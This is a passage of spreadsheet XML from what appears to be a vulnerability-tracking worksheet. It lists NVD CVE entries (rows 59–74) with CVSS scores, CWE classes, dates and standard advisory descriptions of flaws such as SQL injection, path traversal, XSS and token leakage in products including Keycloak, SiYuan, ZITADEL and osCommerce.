      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C59" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105292</t>
        </is>
      </c>
      <c r="D59" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E59" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G59" s="5" t="inlineStr"/>
      <c r="H59" s="5" t="inlineStr"/>
      <c r="I59" s="5" t="inlineStr"/>
      <c r="J59" s="5" t="inlineStr"/>
      <c r="K59" s="5" t="inlineStr"/>
      <c r="L59" s="5" t="inlineStr"/>
      <c r="M59" s="5" t="inlineStr"/>
      <c r="N59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O59" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P59" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q59" s="5" t="inlineStr"/>
      <c r="R59" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S59" s="5" t="inlineStr">
        <is>
          <t>Chaterm before 0.12.1 contains a login cross-site request forgery vulnerability that allows remote attackers to inject login state by sending chaterm:// callbacks without OAuth state validation. Attackers can trigger a crafted callback with attacker-controlled userInfo from a web page, signing the victim into the attacker's account so default data sync uploads saved hosts, passwords, and private keys.</t>
        </is>
      </c>
      <c r="T59" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105292</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C60" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105302</t>
        </is>
      </c>
      <c r="D60" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E60" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G60" s="5" t="inlineStr"/>
      <c r="H60" s="5" t="inlineStr"/>
      <c r="I60" s="5" t="inlineStr"/>
      <c r="J60" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K60" s="5" t="inlineStr"/>
      <c r="L60" s="5" t="inlineStr"/>
      <c r="M60" s="5" t="inlineStr"/>
      <c r="N60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O60" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P60" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q60" s="5" t="inlineStr"/>
      <c r="R60" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S60" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the User Session Note mapper of the Keycloak identity and access management solution. The issue occurs because the mapper does not validate whether a requested session note contains sensitive internal credentials, such as federated access tokens from external identity providers. This allows a delegated client administrator to leak a user's upstream bearer tokens into the tokens issued to their managed application, potentially leading to unauthorized access to the user's data on external platforms.</t>
        </is>
      </c>
      <c r="T60" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105302</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C61" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105174</t>
        </is>
      </c>
      <c r="D61" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E61" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="inlineStr"/>
      <c r="I61" s="5" t="inlineStr"/>
      <c r="J61" s="5" t="inlineStr"/>
      <c r="K61" s="5" t="inlineStr"/>
      <c r="L61" s="5" t="inlineStr"/>
      <c r="M61" s="5" t="inlineStr"/>
      <c r="N61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O61" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P61" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q61" s="5" t="inlineStr"/>
      <c r="R61" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S61" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in Gerapy up to 0.9.13. This vulnerability affects the function project_create of the file gerapy/server/core/views.py of the component Project Management. The manipulation of the argument project_name leads to path traversal. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. The identifier of the patch is 6e481078cfba6388a67ca2d9792288405019ba3e. Applying a patch is the recommended action to fix this issue.</t>
        </is>
      </c>
      <c r="T61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105174</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C62" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105224</t>
        </is>
      </c>
      <c r="D62" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E62" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F62" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="inlineStr"/>
      <c r="I62" s="5" t="inlineStr"/>
      <c r="J62" s="5" t="inlineStr"/>
      <c r="K62" s="5" t="inlineStr"/>
      <c r="L62" s="5" t="inlineStr"/>
      <c r="M62" s="5" t="inlineStr"/>
      <c r="N62" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O62" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P62" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q62" s="5" t="inlineStr"/>
      <c r="R62" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S62" s="5" t="inlineStr">
        <is>
          <t>YesWiki before 4.6.7 contains a cross-site scripting vulnerability in the Bazar valeur action that allows page editors to inject script by rendering unescaped HTML fetched from a remote URL. Attackers can point tools/bazar/actions/valeur.php at a controlled server returning BAZ_fiche_titre markup with an img onerror handler, executing script in every viewer's browser.</t>
        </is>
      </c>
      <c r="T62" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105224</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C63" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105144</t>
        </is>
      </c>
      <c r="D63" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E63" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G63" s="5" t="inlineStr"/>
      <c r="H63" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I63" s="5" t="inlineStr"/>
      <c r="J63" s="5" t="inlineStr"/>
      <c r="K63" s="5" t="inlineStr"/>
      <c r="L63" s="5" t="inlineStr"/>
      <c r="M63" s="5" t="inlineStr"/>
      <c r="N63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O63" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P63" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q63" s="5" t="inlineStr"/>
      <c r="R63" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S63" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in Drogon up to 1.9.13-1/10.0-beta.3 on Windows. Affected is the function StaticFileRouter::route of the file lib/src/StaticFileRouter.cc of the component Static File Router. Executing a manipulation can lead to path traversal. The attack may be performed from remote. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105144</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C64" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105145</t>
        </is>
      </c>
      <c r="D64" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E64" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F64" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G64" s="5" t="inlineStr"/>
      <c r="H64" s="5" t="inlineStr"/>
      <c r="I64" s="5" t="inlineStr"/>
      <c r="J64" s="5" t="inlineStr"/>
      <c r="K64" s="5" t="inlineStr"/>
      <c r="L64" s="5" t="inlineStr"/>
      <c r="M64" s="5" t="inlineStr"/>
      <c r="N64" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O64" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P64" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q64" s="5" t="inlineStr"/>
      <c r="R64" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-284</t>
        </is>
      </c>
      <c r="S64" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in Weaviate Verba up to 2.1.3. Affected by this vulnerability is the function get_environment of the file goldenverba/components/util.py of the component generate_stream Endpoint. The manipulation leads to information disclosure. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105145</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C65" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105161</t>
        </is>
      </c>
      <c r="D65" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E65" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="inlineStr"/>
      <c r="I65" s="5" t="inlineStr"/>
      <c r="J65" s="5" t="inlineStr"/>
      <c r="K65" s="5" t="inlineStr"/>
      <c r="L65" s="5" t="inlineStr"/>
      <c r="M65" s="5" t="inlineStr"/>
      <c r="N65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O65" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P65" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q65" s="5" t="inlineStr"/>
      <c r="R65" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-347</t>
        </is>
      </c>
      <c r="S65" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in invariant-systems-ai aiir up to 1.7.0. The affected element is an unknown function of the component Policy Gate Handler. Executing a manipulation can lead to improper verification of cryptographic signature. The attack can be executed remotely. It is advisable to upgrade the affected component. The GitHub repository of this project is not available anymore. This vulnerability only affects products that are no longer supported by the maintainer.</t>
        </is>
      </c>
      <c r="T65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105161</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C66" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105163</t>
        </is>
      </c>
      <c r="D66" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E66" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F66" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G66" s="5" t="inlineStr"/>
      <c r="H66" s="5" t="inlineStr"/>
      <c r="I66" s="5" t="inlineStr"/>
      <c r="J66" s="5" t="inlineStr"/>
      <c r="K66" s="5" t="inlineStr"/>
      <c r="L66" s="5" t="inlineStr"/>
      <c r="M66" s="5" t="inlineStr"/>
      <c r="N66" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O66" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P66" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q66" s="5" t="inlineStr"/>
      <c r="R66" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-367</t>
        </is>
      </c>
      <c r="S66" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in crossplane crossplane-runtime up to 2.2.2/2.3.2. This vulnerability affects the function Get of the file pkg/xpkg/client.go of the component ImageConfig. The manipulation results in time-of-check time-of-use. The attack may be launched remotely. Upgrading to version 2.2.3, 2.3.3 and 2.4.0-rc.1 is able to resolve this issue. The patch is identified as bee99c6cd6ca81878acca2940a2f0a02169fc208. You should upgrade the affected component.</t>
        </is>
      </c>
      <c r="T66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105163</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C67" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105205</t>
        </is>
      </c>
      <c r="D67" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E67" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F67" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="inlineStr"/>
      <c r="I67" s="5" t="inlineStr"/>
      <c r="J67" s="5" t="inlineStr"/>
      <c r="K67" s="5" t="inlineStr"/>
      <c r="L67" s="5" t="inlineStr"/>
      <c r="M67" s="5" t="inlineStr"/>
      <c r="N67" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O67" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P67" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q67" s="5" t="inlineStr"/>
      <c r="R67" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S67" s="5" t="inlineStr">
        <is>
          <t>SiYuan before 3.8.5 contains an information disclosure vulnerability that allows publish-mode readers to learn backlink block IDs and reference counts from password-protected and publish-disabled documents by querying a published document. Attackers can send POST requests to /api/block/getDocInfo or getDocsInfo for a published document ID to obtain refIDs and refCount of hidden referencing blocks, bypassing the publish confidentiality boundary.</t>
        </is>
      </c>
      <c r="T67" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105205</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C68" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105206</t>
        </is>
      </c>
      <c r="D68" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E68" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F68" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="inlineStr"/>
      <c r="I68" s="5" t="inlineStr"/>
      <c r="J68" s="5" t="inlineStr"/>
      <c r="K68" s="5" t="inlineStr"/>
      <c r="L68" s="5" t="inlineStr"/>
      <c r="M68" s="5" t="inlineStr"/>
      <c r="N68" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O68" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P68" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q68" s="5" t="inlineStr"/>
      <c r="R68" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S68" s="5" t="inlineStr">
        <is>
          <t>ZITADEL 3.0.0 through 3.4.15 and 4.x before 4.17.3 contains an incorrect authorization flaw in the User Service API, which verifies user.read against the caller's organization rather than the organization owning the target user. An authenticated member holding org-scoped user.read can query GET /v2/users/{userId}/authentication_methods to learn which authentication method types users in other organizations have registered.</t>
        </is>
      </c>
      <c r="T68" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105206</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C69" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105137</t>
        </is>
      </c>
      <c r="D69" s="5" t="n">
        <v>5</v>
      </c>
      <c r="E69" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I69" s="5" t="inlineStr"/>
      <c r="J69" s="5" t="inlineStr"/>
      <c r="K69" s="5" t="inlineStr"/>
      <c r="L69" s="5" t="inlineStr"/>
      <c r="M69" s="5" t="inlineStr"/>
      <c r="N69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O69" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P69" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q69" s="5" t="inlineStr"/>
      <c r="R69" s="5" t="inlineStr">
        <is>
          <t>CWE-494</t>
        </is>
      </c>
      <c r="S69" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in Laradock up to 20.4. Impacted is an unknown function of the file workspace/Dockerfile of the component Build Process. The manipulation results in download of code without integrity check. The attack can be launched remotely. A high complexity level is associated with this attack. The exploitability is considered difficult. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T69" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105137</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C70" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105146</t>
        </is>
      </c>
      <c r="D70" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E70" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="inlineStr"/>
      <c r="I70" s="5" t="inlineStr"/>
      <c r="J70" s="5" t="inlineStr"/>
      <c r="K70" s="5" t="inlineStr"/>
      <c r="L70" s="5" t="inlineStr"/>
      <c r="M70" s="5" t="inlineStr"/>
      <c r="N70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O70" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P70" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q70" s="5" t="inlineStr"/>
      <c r="R70" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S70" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in Comsenz Discuz! X5.0-20260801/X5.0-20260820/X5.0-20260910. Affected by this issue is the function modmedalsubmit of the file upload/source/app/admin/child/medals/mod.php of the component Admin Medal Moderation. The manipulation of the argument delete results in sql injection. It is possible to launch the attack remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T70" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105146</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C71" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105176</t>
        </is>
      </c>
      <c r="D71" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E71" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="inlineStr"/>
      <c r="I71" s="5" t="inlineStr"/>
      <c r="J71" s="5" t="inlineStr"/>
      <c r="K71" s="5" t="inlineStr"/>
      <c r="L71" s="5" t="inlineStr"/>
      <c r="M71" s="5" t="inlineStr"/>
      <c r="N71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O71" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P71" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q71" s="5" t="inlineStr"/>
      <c r="R71" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S71" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in SourceCodester Drug Recommendation System 1.0. Impacted is an unknown function of the file /Admin/edit_class.php. This manipulation of the argument ID causes sql injection. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized.</t>
        </is>
      </c>
      <c r="T71" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105176</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C72" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105177</t>
        </is>
      </c>
      <c r="D72" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E72" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="inlineStr"/>
      <c r="I72" s="5" t="inlineStr"/>
      <c r="J72" s="5" t="inlineStr"/>
      <c r="K72" s="5" t="inlineStr"/>
      <c r="L72" s="5" t="inlineStr"/>
      <c r="M72" s="5" t="inlineStr"/>
      <c r="N72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O72" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P72" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q72" s="5" t="inlineStr"/>
      <c r="R72" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S72" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in SourceCodester Drug Recommendation System 1.0. The affected element is an unknown function of the file /Admin/add_drug.php of the component Drug Creation. Such manipulation of the argument txtname/cmdtype/txtusage/txtsideeffect/cmdcontraindication leads to sql injection. The attack may be performed from remote. The exploit is publicly available and might be used.</t>
        </is>
      </c>
      <c r="T72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105177</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C73" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105178</t>
        </is>
      </c>
      <c r="D73" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E73" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F73" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="inlineStr"/>
      <c r="I73" s="5" t="inlineStr"/>
      <c r="J73" s="5" t="inlineStr"/>
      <c r="K73" s="5" t="inlineStr"/>
      <c r="L73" s="5" t="inlineStr"/>
      <c r="M73" s="5" t="inlineStr"/>
      <c r="N73" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O73" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P73" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q73" s="5" t="inlineStr"/>
      <c r="R73" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S73" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in SourceCodester Drug Recommendation System 1.0. The impacted element is the function mysqli_real_escape_string of the file /Admin/add_symptom.php of the component Symptom Creation. Performing a manipulation of the argument txtname results in sql injection. It is possible to initiate the attack remotely. The exploit has been released to the public and may be used for attacks.</t>
        </is>
      </c>
      <c r="T73" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105178</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C74" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105226</t>
        </is>
      </c>
      <c r="D74" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E74" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F74" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G74" s="5" t="inlineStr"/>
      <c r="H74" s="5" t="inlineStr"/>
      <c r="I74" s="5" t="inlineStr"/>
      <c r="J74" s="5" t="inlineStr"/>
      <c r="K74" s="5" t="inlineStr"/>
      <c r="L74" s="5" t="inlineStr"/>
      <c r="M74" s="5" t="inlineStr"/>
      <c r="N74" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O74" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P74" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q74" s="5" t="inlineStr"/>
      <c r="R74" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-94</t>
        </is>
      </c>
      <c r="S74" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in osCommerce osCommerce2 up to 2.3.4.1. This vulnerability affects the function include of the file admin/newsletters.php of the component Newsletter Management. Performing a manipulation of the argument module results in code injection. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T74" s="6" t="inlineStr">
        <is>
